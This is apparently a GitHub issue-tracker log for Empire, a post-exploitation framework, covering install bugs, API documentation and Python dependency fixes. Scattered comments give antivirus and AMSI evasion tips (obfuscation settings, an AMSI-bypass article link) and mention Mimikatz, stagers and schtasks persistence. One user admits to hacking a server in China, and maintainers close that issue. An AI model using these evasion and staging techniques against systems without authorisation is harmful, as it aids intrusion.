[2020-03-12 13:27] RedBulletTooling opened #127 "[BUG] RESTful API create listener UnboundLocalError when Name is not provided"
**Empire Version**
- Empire 3.1.1 BC-Security Fork

**OS Information (Linux flavor, Python version)**
- OS: Debian 10.3
- Python: 3.7.3

**Describe the bug**
When creating a listener via the RESTful API and you do not provide a name for the listener, it will provide the following error;

{'error': 'UnboundLocalError("local variable \'listenerName\' referenced before assignment")'}

The listener is

[2020-03-13 02:30] Hubbl3 commented on #127
@RedBulletTooling Thanks a lot for all the input. We recognize that the API is not really gracefully handling Empire  errors and some of the other errors.

Are you okay with us closing your individual errors and creating a centralized error/thread for the API mishandling empire errors

[2020-03-13 06:37] RedBulletTooling commented on #127
@Hubbl3 Sure! Will create more issues on that central thread if I stumble upon them.

[2020-03-13 07:00] RedBulletTooling commented on #126
Tested some more today and for some reason if I specify the listener name as http, it handles it (somewhat more) better by trying to create a listener with the name http1. It currently still fails because it is trying to create a listener on a port where there already is a listener - though yet again it says the listener has been created correctly wrongfully. If you create a listener with the same

[2020-03-13 09:00] RedBulletTooling commented on #122
First thoughts;

Check before sudo if sudo is present; if not use su => install sudo and return to normal user. Afterwards continue as normal and ask for sudo. (Probably should add some automatic code to add user to sudo file, otherwise user will get the error for sure.)

Add check for Debian 10.x (or add to existing check if possible (some deps need to be installed first) and install
python3-pip

[2020-03-15 02:48] Cx01N commented on #87
@Invoke-Mimikatz Unfortunately, we are still not experiencing this issue and cannot reproduce it. If you are able to come up with some reproducible steps or conditions then please open a new issue.

[2020-03-15 02:48] #87 closed

[2020-03-15 02:50] Cx01N commented on #86
@hypnoticpattern Closing the issue for now. Please feel free to open a PR or new issue if you get the launcher updated.

[2020-03-15 02:50] #86 closed

[2020-03-16 02:11] Cx01N commented on #26
Closing issue. Backward compatibility with python 2.7 will no longer be supported after 3.0.x.

[2020-03-16 02:11] #26 closed

[2020-03-18 14:52] frosty1313 opened #132 "[BUG] Incorrect API documentation"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: N/A
- Python: N/A

**Describe the bug**
All four RESTful API end points listed at https://github.com/BC-SECURITY/Empire/wiki/RESTful-API#admin-functionality have incorrect handlers.  The handler should be: GET /api/admin/[endpoint].

**To Reproduce**
Steps to reproduce the behavior:
1. Go to https://github.com

[2020-03-18 15:25] Cx01N commented on #132
Thanks for the heads up. We ported the Wiki over from the original project and haven't had much time to update many of the pages.

I am pretty sure that Github doesn't have a way to do PRs for the Wiki, but I can use this thread to track the API documentation updates. So, please feel free to let us know if you see any others.

[2020-03-18 15:34] frosty1313 commented on #132
@Cx01N no problem.  FWIW, I did a bit of Googling, it appears Github doesn't support PRs  on Wiki pages  https://stackoverflow.com/questions/10642928/how-to-pull-request-a-wiki-page-on-github.

I think the rest are correct and the examples all look correct.  Thanks for the quick response!

[2020-03-19 04:15] dickens88 opened #133 "Invoke-mimikatz can not DumpCerts[BUG]"
**Empire Version**
- Empire 3.x latest version

**OS Information (Linux flavor, Python version)**
- OS: win10 1903 18362.720
- Python:

**Describe the bug**
I'm trying to use DumpCerts at win10 1903 os, but got issue, showing below:

**Screenshots**
If applicable, add screenshots to help explain your problem.
![sc2020-03-190008](https://user-images.githubusercontent.com/8390209/77030999-4d11fc00-6

[2020-03-19 04:15] #133 closed

[2020-03-19 04:23] dickens88 opened #134 "[BUG] Invoke-mimikatz can not DumpCerts"
**Empire Version**
- Empire 3.x latest version

**OS Information (Linux flavor, Python version)**
- OS: win10 1903 18362.720
- Python: no

**Describe the bug**
I'm trying to use DumpCerts at win10 1903 os, but got issue, showing below:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

**To Reproduce**
Steps to reproduce the behavior:
1. Go to '. .\Invoke-Mimikatz.ps1'
2. Click on

[2020-03-19 05:01] Cx01N commented on #134
@dickens88 What version of empire are you running? It looks like you are running mimikatz directly from the script without Empire.

[2020-03-19 05:39] dickens88 commented on #134
@Cx01N hi, in fact, i run the invoke-mimikatz script which is in the Empire project directly. https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1

i download the latest version just now. Do i need to change another way?

[2020-03-19 05:44] Cx01N commented on #134
@dickens88 can you provide steps and a screenshot? The one you provided is of mimikatz being ran directly on a target without the use of Empire.

In the future, please fill out the Empire version number, Python version, and Linux flavor to ensure we can answer any questions quickly.

I also suggest opening a ticket on their github due to this appearing to be a Mimikatz error and not Empire.

[2020-03-19 05:48] dickens88 commented on #134
@Cx01N ok sure, i will follow your suggestion, thank you very much

[2020-03-19 05:48] #134 closed

[2020-03-19 16:11] frosty1313 commented on #132
Spoke too soon.  For Create A Listener, a failure response is of the form:
{'error': 'failed to start listener [listener_name]'}.

It's not documented for Generate Stager, but failure response is {'error': error message}

[2020-03-19 19:56] Cx01N commented on #132
I'll get those fixed either later today or tomorrow. The feedback is extremely helpful, thank you!

[2020-03-20 13:31] frosty1313 commented on #132
@Cx01N - at some point I'll try and test every call, kind of just finding stuff as I implement a client and a project that uses it.
I think this will be for any endpoint that returns a dictionary of agent details like Get Agent By Name, sessionID should be session_id.  I encountered the error specifically in Get Current Agents.

[2020-03-20 14:28] frosty1313 commented on #132
There's several URIs in the below (found in the main empire file) that aren't on the Wiki.  I think I'll have time next week to write them up to save you the time.  (Also, there's a conspicuous TODO right above the banner.... more research)

#TODO: Update with new commads
####################################################################
#
# The Empire RESTful API.
#
# Adapted from http://blog.m

[2020-03-21 16:25] sh1va73 opened #135 "Error after fresh install"
I did a fresh install of Empire on Kali 2020.2 and now I get an error when starting empire:
ValueError: cannot use LOCALE flag with a str pattern

[2020-03-21 16:25] #135 closed

[2020-03-21 16:30] sh1va73 opened #136 "[BUG] error after fresh install"
**Empire Version**
- Empire 3.1.2

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.2
- Python: 3

**Describe the bug**
A clear and concise description of what the bug is.
I did a fresh install on Kali 200 and get this error when i start ./empire

**To Reproduce**
Steps to reproduce the behavior:
1. Go to '/opt/empire'
2. Click on ' ./empire'
3. Scroll down to 'error'
4. See error

[2020-03-21 16:42] sh1va73 commented on #136
I fixed it by copying an old installation from another computer. Now I have Empire working again. But I still don't know where that error came from.

[2020-03-21 17:42] sh1va73 commented on #136
Its still not working. Empire starts but I have no listeners. When  I do uselistener <tab><tab> its empty. When i  do uselistener http:
(Empire: listeners) > uselistener http
[!] Error: invalid listener module

[2020-03-21 17:51] Hubbl3 commented on #136
@sh1va73 did you run reset? Also are you ensuring that you are running as sudo? The new kali versions do not run as sudo by default anymore

[2020-03-21 18:23] sh1va73 commented on #136
Yes I am root, I just reverted and did the install again:
apt install powershell-empire
then:
sudo powershell-empire
then I get the error from my first post:
ValueError: cannot use LOCALE flag with a str pattern

[2020-03-21 18:32] Hubbl3 commented on #136
O. Have you run `apt get update` first? You also have to remove empire completely and reinstall it when using `apt`. We don't have any control over the apt database as that is maintained by Kali so you would have to open an issue with them to get that problem addressed

[2020-03-21 23:51] blshkv opened #138 "replace pycrypto with pycryptodome"
https://blog.sqreen.com/stop-using-pycrypto-use-pycryptodome/

[2020-03-21 23:51] #138 closed

[2020-03-22 00:00] blshkv opened #139 "[BUG] Pycrypto deprecation"
**Empire Version**
 - Empire 3.1.1 (git)

**OS Information (Linux flavor, Python version)**
- OS:  Pentoo
- Python: Python3

**Describe the bug**
https://blog.sqreen.com/stop-using-pycrypto-use-pycryptodome/
pycrypto should not be used

**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...' setup/
2. Inspect requirements*.txt
https://github.com/BC-SECURITY/Empire/blob/master/setup/requir

[2020-03-22 00:39] Cx01N commented on #132
@frosty1313 I'm in the process of redoing the API wiki. It is really out-of-date since it was left mostly unchanged from the original project. I'll check back with you when it's complete and see if you would like to review it.

[2020-03-22 11:29] sh1va73 commented on #136
I removed everything and did git clone now. I found out there is an issue with osrframework. When I install osrframework then empire breaks down. Always i get error

[*] Loading stagers from: /opt/Empire//lib/stagers/
Traceback (most recent call last):
File "./empire", line 1502, in
main = empire.MainMenu(args=args)
File "/opt/Empire/lib/common/empire.py", line 113, in init
self.stagers = stagers.

[2020-03-22 15:59] vinnybod commented on #139
As far as I can tell, we can just remove `pycrypto` from the requirements. I don't see it imported anywhere and there's an old message in the changelog about removing it.

https://github.com/BC-SECURITY/Empire/blob/e1e5c826f75dfc5be3a97b3160415898668cd5b4/changelog#L192

[2020-03-22 16:35] vinnybod commented on #39
@blshkv I am new to the Python ecosystem, so forgive my ignorance, but I am trying to figure out how this would work for an application like Empire which requires quite a few things installed outside of Python to work properly such as Powershell. Do you have any examples of application with a similar problem?

[2020-03-23 02:16] blshkv commented on #39
setup.py is used to install python packages only (including python bindings), non-python packages should be installed separately (using "pkg-manager install powershell"). You can provide a shell script for users' convenience. However, the goal should be to create a distro package, so end-user would simply run "pkg-manager install empire"

[2020-03-23 03:50] Cx01N commented on #40
Added fix into Empire v3.1.3

[2020-03-23 03:50] #40 closed

[2020-03-28 12:29] sh1va73 opened #142 "[BUG] [!] strip_python_comments is deprecated and should not be used"
**Empire Version**
- Empire 3.1.3

**OS Information (Linux flavor, Python version)**
- OS: Kali 202.2
- Python: 3.7.7

**Describe the bug**
I have a http listener active. I create a stager multi/bash. Then I open the stager output on target device (Ubuntu 18.04)
I get this output, the agent is active and then closes with this error.

(Empire: stager/multi/bash) >
[*] Sending PYTHON stager (stage 1

[2020-03-28 12:29] #142 closed

[2020-03-28 12:39] sh1va73 opened #143 "[BUG] strip_python_comments is deprecated error closes connection"
Empire Version

    Empire 3.1.3

OS Information (Linux flavor, Python version)

    OS: Kali 202.2
    Python: 3.7.7

Describe the bug
I have a http listener active. I create a stager multi/bash. Then I open the stager output on target device (Ubuntu 18.04)
I get this output, the agent is active and then closes with this error.

(Empire: stager/multi/bash) >
[] Sending PYTHON stager (stage 1) to

[2020-03-28 13:38] sh1va73 commented on #143
I found a workaround. If I go back and then go to agents , then the agent is active and I can interact with it. So it works but with an error and a workaround. I think this is  a bug in Empire.

[2020-03-28 21:51] Cx01N commented on #143
It looks like you tried to interact with agent before it was done staging. You will need to first interact with agent to use those commands.

As for the error, it is intentionally displayed and was an artifact from the original project. However, it should not affect the functionality. I'll add removing the dependency to our roadmap. Thanks.

[2020-03-28 21:53] Cx01N commented on #136
Closing due to the issue being resolved.

[2020-03-28 21:53] #136 closed

[2020-03-29 01:14] vinnybod commented on #139
Looks like my previous comment was wrong, pycrypto does get used.

However, upon reading the [README for pycryptodome](https://github.com/Legrandin/pycryptodome):

One must avoid having both PyCrypto and PyCryptodome installed at the same time, as they will interfere with each other.
This option is therefore recommended only when you are sure that the whole application is deployed in a virtualenv

[2020-03-29 01:22] blshkv commented on #139
no, that comment means that you should be able just to replace pycrypto with pycryptodome in most cases. FYI, I have done that and didn't encourage any obvious problems.

[2020-03-29 01:44] vinnybod commented on #139
I'm not sure how you got that interpretation. The comment specifically says that you must AVOID having them both installed and that is is recommended to use only use the drop in replacement if you are in a virtual environment. So we will make the switch over after getting Empire instrumented with Pipenv.

[2020-03-29 01:55] blshkv commented on #139
PyCryptodome is like a fork of PyCrypto, i.e. next version. That's why it has the same set of files (can't be installed in the same time) and the same API.

[2020-03-29 01:57] blshkv commented on #139
https://pycryptodome.readthedocs.io/en/latest/src/vs_pycrypto.html

[2020-03-29 02:05] vinnybod commented on #139
Yup, I read the blog post, which failed to outline the caveats, which is why I went to the README.  👍

[2020-03-29 02:06] blshkv commented on #139
sorry, not an expert in python, just trying to help. And just found that "minor" issue too ;-) Shouldn't be very difficult to fix it

[2020-03-29 02:07] vinnybod commented on #139
As I said before, this will get fixed. I'm working on a pretty big change that includes moving to Pipenv, so I'd rather not do the work twice.

[2020-03-29 02:11] blshkv commented on #139
FYI, I'm porting your tool in Pentoo and virtual env is not an option. We install all packages as system-wide tools (as any other distro), and pycryto no longer available. Thus, this request ;-)
Thanks!

[2020-03-29 02:14] vinnybod commented on #139
@blshkv I'll be sure to field your input as well as the Kali team before merging it in to make sure we are making things easier and not more difficult for you guys!

[2020-03-29 09:39] avi8892 opened #146 "How do I install it ?"
How do I install it ?

[2020-03-29 09:39] #146 closed

[2020-04-02 19:50] Cx01N commented on #43
@Invoke-Mimikatz I added a check to clear the table if the module has been run before. It is not the most graceful fix, but it fixes the issue. Could you test out the PR and see if it fixed the issue for your setup?

[2020-04-02 21:31] Invoke-Mimikatz commented on #43
Nice fix. Seems to work as expected on my systems

<img width="1077" alt="image" src="https://user-images.githubusercontent.com/57604669/78301857-57fe7d80-74ff-11ea-8e90-080fa4aca537.png">

[2020-04-02 21:31] #43 closed

[2020-04-03 20:33] 0xskywalker opened #151 "[BUG] userland/schtasks errors out"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: Livux
- Python:

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:
1. on using autorun to execure following command on new agents sessions
usemodule persistence/userland/schtasks
execute
2. New agents session autorun errors out
with the

[2020-04-03 20:33] #151 closed

[2020-04-03 20:37] 0xskywalker opened #152 "[BUG] userland/schtasks errors out"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: Linux
- Python: Python 3.7.5

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:
1. on using autorun to execure following command on new agents sessions
usemodule persistence/userland/schtasks
execute
2. New agents session autorun errors

[2020-04-03 20:37] #152 closed

[2020-04-03 20:45] 0xskywalker opened #153 "[BUG] persistence/schtasks errors out"
**Empire Version**
- Empire 3.x

***OS Information (Linux flavor, Python version)**
- OS: Ubuntu Linux
- Python: Python 3.7.5

**Describe the bug**
powershell/persistence/userland/schtasks error out on new agent session

**To Reproduce**
Steps to reproduce the behavior:
1. on using autorun to execure following command on new agents sessions
usemodule persistence/userland/schtasks
execute
2. New ag

[2020-04-05 09:56] #153 closed

[2020-04-05 10:00] 0xskywalker commented on #153
Fixed at [#95](https://github.com/BC-SECURITY/Empire/issues/95)

[2020-04-06 23:55] #108 closed

[2020-04-07 05:01] tyraniter opened #154 "[BUG] Powershell version 2 TLS Handshake failure"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu1804
- Python: 2.7

**Describe the bug**
When using powershell client on Windows 7 on which the default version of powershell and dotnet is 2 to connect to a https listener , there will be an "HandShake Failure"
![image](https://user-images.githubusercontent.com/6822883/78627661-a4153d80-78c4-11ea-972e-7

[2020-04-07 05:01] #154 closed

[2020-04-07 06:48] tyraniter opened #155 "[BUG]Powershell version 2 TLS Handshake failure"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu1804
- Python: 2.7

**Describe the bug**
When using powershell client on Windows 7 on which the default version of powershell and dotnet is 2 to connect to a https listener , there will be an "HandShake Failure"
![image](https://user-images.githubusercontent.com/6822883/78636468-fa8d7680-78da-11ea-8eb7-a

[2020-04-07 07:20] tyraniter commented on #155
Maybe we can do like this:

[2020-04-07 11:19] Sa1riil opened #156 "More obfuscation methods"
**Is your feature request related to a problem? Please describe.**
Hi, i was thinking that the currently available obfuscation methods in Empire are to few. Besides this, i was thining that will be really cool to have an option to create download obfuscated command.

**Describe the solution you'd like**
- For the obfuscation methods, i suggest to have available all methods with all suboptions from

[2020-04-07 11:19] #156 closed

[2020-04-07 11:23] Sa1riil opened #157 "[FEATURE REQUEST] More obfuscation methods"
**Is your feature request related to a problem? Please describe.**
It is really frunstranting when an AV is blocking an Empire module or a payload. I consider the below obfuscation methods will help us to use the scripts who are easily detected by AV's signatures based on strings.

**Describe the solution you'd like**
Hi, i was thinking that the currently available obfuscation methods in Empire ar

[2020-04-07 18:45] Hubbl3 commented on #155
@tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

[2020-04-07 18:53] Hubbl3 commented on #157
I just double checked and you already have access to AST obfuscation via Invoke-Obfuscation. You just have to specify it like this `set ObfuscateCommand ast\all\1` if you want to use token obfuscation in addition you just have to comma separate it like this `set ObfuscateCommand ast\all\1,token\all\1`

As to adding in other projects for in terminal support that is not currently on our map. They al

[2020-04-07 23:02] Cx01N commented on #143
Closing due to inactivity, but please reopen if the issue persists after using `interact R6HNE19A`.

[2020-04-07 23:02] #143 closed

[2020-04-08 07:16] Sa1riil commented on #157
Hey thank you for your response.
I will look forward for every new update of yours.

[2020-04-08 07:17] #157 closed

[2020-04-08 23:44] Cx01N opened #158 "[BUG] Reset flag throws error in Kali distro"
**Empire Version**
- Empire 3.1.4

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.1
- Python: 3.7.7

**Describe the bug**
The command `--reset-empire` throws an error when using the kali distro version of Empire. After the flag is used, Empire's database becomes corrupted and the file /root/.local/powershell-empire/empire.db must be deleted manually to restore it.

**To Reproduc

[2020-04-09 02:40] tyraniter commented on #155
Let me submit a PR

[2020-04-09 07:56] SYFLS opened #159 "[BUG]Module is invalid"
**Empire Version**
- Empire 3.1.2

**OS Information (Linux flavor, Python version)**
- OS: KALI
- Python: 3.7

**Describe the bug**
The webcam module is invalid, the cmd module does not support Chinese,I hacked into a server in China, but due to language issues, I cannot download any files
![1](https://user-images.githubusercontent.com/54468595/78870741-32cabb80-7a79-11ea-92a9-4f2e85f75f7f.PNG)
![

[2020-04-09 07:56] #159 closed

[2020-04-09 08:11] SYFLS opened #160 "[BUG]Module is invalid"
**Empire Version**
- Empire 3.1.2

**OS Information (Linux flavor, Python version)**
- OS: KALI
- Python: 3.7

**Describe the bug**
The webcam module is invalid, the cmd module does not support Chinese,I hacked into a server in China, but due to language issues, I cannot download any files.

**To Reproduce**
1.usemodule collection/WebcamRecorder  execute
2.Unable to start the webcam, my webcam has

[2020-04-09 16:45] pawp81 opened #161 "[BUG] failed to fetch Empire binaries with apt"
**Empire Version**
- Empire 3.1.4

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux
- Python: 3.7.6

**Describe the bug**
I am getting following error when trying to install Empire with apt install powershell-empire.

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  liblttng-ust-ctl4 li

[2020-04-09 16:45] #161 closed

[2020-04-09 19:51] pawp81 opened #162 "[BUG] apt install powershell-empire: 404 Not Found"
**Empire Version**
- Empire 3.1.4

**OS Information (Linux flavor, Python version)**
- OS: Kali Linux
- Python: 3.7.6

**Describe the bug**
I am getting following error when trying to install Empire with apt install powershell-empire.

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
liblttng-ust-ctl4 libl

[2020-04-09 21:50] Cx01N commented on #162
@pawp81 It looks like you are trying to install 3.1.2. You didn't list which version of Kali you are working in so I will assume its 2020.1 since that is latest version. Try to run `sudo apt update` to get an updated repo and then `sudo apt install powershell-empire`. This should install Empire 3.1.4.

The latest version of Kali no long runs sudo by default so you'll have to run things with it for

[2020-04-10 07:35] pawp81 commented on #162
Right. Thx. case closed.

[2020-04-10 21:57] #162 closed

[2020-04-11 03:15] Hubbl3 commented on #160
@SYFLS this appears to be a request supporting illegal activity which forces us to close the issue.

Empire is only for research purposes and engagements in which the user has been given express permission for the activities being conducted.

If this has been taken out of context please re-open the issue with clarification.

[2020-04-11 03:15] #160 closed

[2020-04-11 08:05] pawp81 opened #164 "[BUG] Windows/Macro stager is missing WMI connection declaration when OutlookEvasion is enabled"
**Empire Version**
- Empire 3.1.4

**OS Information (Linux flavor, Python version)**
- OS: 2020.1
- Python: 3.7.6

**Describe the bug**
When OutlookEvasion is enabled in windows/macro stager, macro is failing with "run-time error 424; Object required"

**To Reproduce**
Create windows/macro stager. Set OutlookEvasion to true. execute
Copy paste the code to the Office document.
Run macro

**Expected

[2020-04-11 14:09] sh1va73 opened #165 "[BUG] Mac install error"
**Empire Version**
Empire - 3.1.4 BC-Security Fork

**OS Information (Linux flavor, Python version)**
- OS: MacOSx Catalina
- Python: 3.7.7

**Describe the bug**
I installed Empire successfully on Mac.
When starting ./empire on Mac OSX I get an error:

ModuleNotFoundError: No module named 'Crypto'

I did install pip3 install pycrypto successfully but the error stays.

**To Reproduce**
Steps to rep

[2020-04-11 14:17] sh1va73 commented on #165
Temporary fix: in file /opt/Empire/lib/stagers/windows/backdoorLnkMacro.py
 I commented:
#from Crypto.Cipher import AES

Now Empire works on Mac, but did I break something with commenting this line?

[2020-04-11 15:15] sh1va73 opened #166 "[BUG] location of python on Mac"
**Empire Version**
- Empire 3.1.4

**OS Information (Linux flavor, Python version)**
- OS: MacOSX Catalina
- Python: 3.7

**Describe the bug**
when generating a payload for Mac osx then the string has this location to python: /usr/bin/python3

But my Python3 on Mac is located at /usr/local/bin/python3, so I need to change this manually before executing.

**To Reproduce**
Steps to reproduce the beh

[2020-04-11 17:00] vinnybod commented on #165
We need to add a line to the readme to make this more explicit, but we are really only targeting Kali, Debian, and Ubuntu officially and those are the only ones we target in the install script. We provide the Docker builds as a convenience for if you want to run on a different OS. I personally use a Macbook Pro and run Empire in the Docker release builds. With that said, we will accept PRs that fi

[2020-04-11 17:10] sh1va73 commented on #165
Thanks for the feedback. I did try pip3 install pycrpyto and pycryptodome but the error was still there.  I will try a docker installion as well.

[2020-04-11 18:37] gearcapitan opened #167 "[BUG]"
**Empire Version**
- Empire 3.x
LAst
**OS Information (Linux flavor, Python version)**
- OS: last version of kali linux
- Python:

**Describe the bug**
A clear and concise description of what the bug is.
![imagen](https://user-images.githubusercontent.com/13740942/79052073-7e0bd800-7bf9-11ea-9016-8f72d9ae1f1f.png)

![imagen](https://user-images.githubusercontent.com/13740942/79052093-90861180-7bf9

[2020-04-11 18:37] #167 closed

[2020-04-12 03:22] Cx01N commented on #158
Issue from moving the database in Kali's version, opened a ticket on their GitLab to fix.

[2020-04-12 03:22] #158 closed

[2020-04-12 03:30] Cx01N commented on #166
@sh1va73 Which stager and listener and you trying to use for this? Also, can you try to run this on Kali or Ubuntu so we can eliminate MacOS as a possible cause for your Empire server.

[2020-04-12 08:07] sh1va73 commented on #166
The stager was osx/applescript. I generated this on Mac and Kali to test.

[2020-04-12 16:57] Cx01N commented on #166
@sh1va73 I am not able to reproduce the issue you described. Are you running your Empire server on Kali? And do you have Python 3 installed on your Mac? We currently don't support Python 2 launchers, so you will have to ensure your target has Python 3 installed.

Also, make sure you are running the AppleScript as a script and not as a bash command. I've made that mistake before.

![image](https://

[2020-04-12 17:19] sh1va73 commented on #166
Yes I run it on Kali and I have python3 on my Mac.
Seems your python3 on your Mac is located at /usr/bin.
Mine is located at /usr/local/bin.
Thats why I am having this issue. But I can change it manually.

[2020-04-12 17:35] Cx01N commented on #166
Oh, that is really interesting.
@vinnybod where is yours located? You seem to run Mac the most out of all of us.

[2020-04-12 19:15] vinnybod commented on #166
This is all going to depend on how python was installed by the user.
`/usr/bin` is where MacOS installs the python binaries. In Catalina, a binary for python3 was added here, but until the user installs the developer tools it is just a stub. My guess for why you would have it in `/usr/local/bin` is if you installed it via homebrew or some other method, which is completely valid. Does the generated

[2020-04-12 19:21] vinnybod commented on #165
This is related to https://github.com/BC-SECURITY/Empire/issues/139 . If pycrypto is literally only used in this one stager, could it be that hard to replace the AES function its using with a different library? We already do AES in `encryption.py` using the cryptography library. @Cx01N

[2020-04-12 19:29] Cx01N commented on #166
@vinnybod I tried the pipe with just python3 and it seems to run fine. I will just have to run a few different test cases to make sure we aren't breaking functionality elsewhere.

@sh1va73 Does changing to `| python3 &` work on your setup?

[2020-04-13 08:22] tyraniter opened #169 "[BUG] Random function name starts with a number is not supported on powershell 2"
**Empire Version**
- Empire 3.1

**OS Information (Linux flavor, Python version)**
- OS: ubuntu1904
- Python: 2/3

**Describe the bug**
Powershell version 2 does not support function name starts with number, so the random function name aliasing to Invoke-Empire & Mimikatz might cause an error when running on powershell 2.

**To Reproduce**
N/A

**Expected behavior**
Fix the first identifier of fun

[2020-04-13 08:46] sh1va73 commented on #166
Yes I have Python3 installed with Homebrew.

[2020-04-13 09:07] sh1va73 commented on #166
On my side chasing to | python3 & did not help.

[2020-04-13 13:53] whmacmac opened #170 "Question about new ways of bypassing WindowsDefender"
## Empire Version
3.1.4

## OS Information (Linux flavor, Python version)
5.4.0-4parrot1-amd64 #1 SMP Parrot 5.4.19-4parrot1 (2020-02-27) x86_64 GNU/Linux

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Hi, I watched your presentation about AMSI bypass and sandboxing. My bad was that i waited till today to

[2020-04-13 23:50] Hubbl3 commented on #170
@whmacmac  I am going to close this issue because it's not really relevant to the development of Empire. In the future the bloodhound gang has a slack channel on their server that's dedicated to Empire that I hang out in and can help you there.

For now, here are some tips:

First turn safechecks off. I need to rename it but safechecks really just checks if the version is powershell 3 or higher is

[2020-04-13 23:50] #170 closed

[2020-04-13 23:50] Hubbl3 commented on #170
Also here is a really good article on AMSI Bypasses

https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/

[2020-04-14 03:02] Hubbl3 commented on #165
@sh1va73  and @vinnybod  that suggested fix could work but I am closing the issue due to the fact that Mac is not one of our supported Operating Systems for installing Empire

[2020-04-14 03:02] #165 closed

[2020-04-14 04:10] Cx01N commented on #155
Fix added to v3.1.5

[2020-04-14 04:10] #155 closed

[2020-04-14 04:10] #164 closed

[2020-04-15 02:17] Hubbl3 commented on #169
@tyraniter submitted a pull request fixing the issue

[2020-04-16 04:22] Hubbl3 opened #173 "[FEATURE REQUEST] Consistent formatting for Time stamps to UTC"
**Is your feature request related to a problem? Please describe.**
Logs can't be properly correlated because time stamps have no time zone attached

**Describe the solution you'd like**
Logs should be stored and tagged with UTC so that when exported they can be correlated with engagement reports

**Describe alternatives you've considered**
A clear and concise description of any alternative solutio

[2020-04-16 04:50] Cx01N opened #174 "[BUG] Removing an agent, removes it from the log"
**Empire Version**
- Empire 3.1.5

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020.1
- Python: 3.7.5

**Describe the bug**
Killing/removing an agent causes it to remove itself from the database.

**To Reproduce**
Steps to reproduce the behavior:
1. Kill Agent
2. Generate report

**Expected behavior**
A killed/removed agent should no longer be displayed in the agents table, but sh

[2020-04-16 14:47] sh1va73 opened #175 "[BUG] full upgrade"
**Empire Version**
- Empire 3.1.5

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020
- Python: 3.7

**Describe the bug**
Today I did **apt-get full-upgrade** on Kali and after that Empire was not working anymore.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to Kali
2. apt-get update && apt-get full-upgrade
3. open ./empire
4. See error

**Expected behavior**
before the

[2020-04-16 16:56] Cx01N commented on #175
@sh1va73 Please provide screenshots or paste in the error that you are receiving.

[2020-04-16 16:59] sh1va73 commented on #175
Already I reverted back, but it was mostly about missing dependencies. Tomorrow I will recreate the issue with a new apt-get full-upgrade and post all the errors here.

[2020-04-17 09:41] sh1va73 commented on #175
Today I did apt-get dist-upgrade. I got errors of missing dependencies , so i did ./install.sh
After that all missing dependencies got installed.
Then, I try to start Empire and I got this error:

Traceback (most recent call last):
  File "./empire", line 1533, in <module>
    main = empire.MainMenu(args=args)
  File "/opt/Empire/lib/common/empire.py", line 98, in __init__
    (self.isroot, self.i

[2020-04-17 09:43] sh1va73 commented on #175
Fixed with running reset.sh.
All working fine now.

[2020-04-17 09:43] #175 closed

[2020-04-18 00:37] x1n5h3n opened #176 "[BUG]"
**Empire Version**
- Empire 3.1.5
**OS Information (Linux flavor, Python version)**
- OS: Debian sid
- Python: 3.8.2

**Describe the bug**
Errors in  /setup/install.sh

I manage to resolve errors by modifying the script.
Gonna make a pull request because I can't upload the install.sh file here.

[2020-04-18 00:37] #176 closed

[2020-04-18 00:49] x1n5h3n opened #177 "[BUG] Errors in install.sh"
**Empire Version**
- Empire 3.1.5
**OS Information (Linux flavor, Python version)**
- OS: Debian sid
- Python: 3.8.2

**Describe the bug**
Errors in  /setup/install.sh

**To Reproduce**
`sudo ./setup/install.sh`

**Expected behavior**
It should install empire without any errors

**Screenshots**
![image](https://user-images.githubusercontent.com/17899389/79623965-5a232780-810e-11ea-8672-fe5ecc2bb1b

[2020-04-18 04:00] Cx01N commented on #177
@x1n5h3n Can you please post what error messages you received when running the install script?

[2020-04-18 06:44] TKD-SEC opened #178 "[BUG] Onedrive Listener"
## Empire Version
3.1.5

## OS Information (Linux flavor, Python version)
Kali Linux, Python 3.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
I followed the instructions for the one drive listener setup at bc-security blog, but it wont work.

## Screenshot of error, embedded text output, or Pastebin link

[2020-04-18 11:29] sh1va73 opened #179 "[BUG] orphaned agent"
**Empire Version**
- Empire 3.1.7

**OS Information (Linux flavor, Python version)**
- OS: Kali 2020
- Python: 3.7

**Describe the bug**
After updating Kali and reinstalling Empire I get this error :
(Empire: agents) > [!] Error from agents.handle_agent_data() for login/process.php from 10.0.2.15: b'ERROR: sessionID R\x1c\xc2\x98\xc3\xa7\x0c&+\xc3\x83 not in cache!'
[*] Orphaned agent from 10.0.2.

[2020-04-18 12:42] sh1va73 commented on #179
I fixed by recreating a new listener, new stager. Now it works. Still want to know what the error was.

[2020-04-18 14:59] ghost5egy opened #180 "[BUG]"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: debian
- Python: 3

I got this message when agent register on empire if I set the slack token :
TypeError: POST data should be bytes, an iterable of bytes, or a file object. It cannot be of type str.

[2020-04-18 14:59] #180 closed

[2020-04-18 15:03] ghost5egy opened #181 "[BUG] slack token error when agent connected"
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: debian
- Python: 3

**Describe the bug**
I got this message when agent register on empire if I set the slack token :
TypeError: POST data should be bytes, an iterable of bytes, or a file object. It cannot be of type str.

the I lose the agent it goes to loop  trying to register vise versa
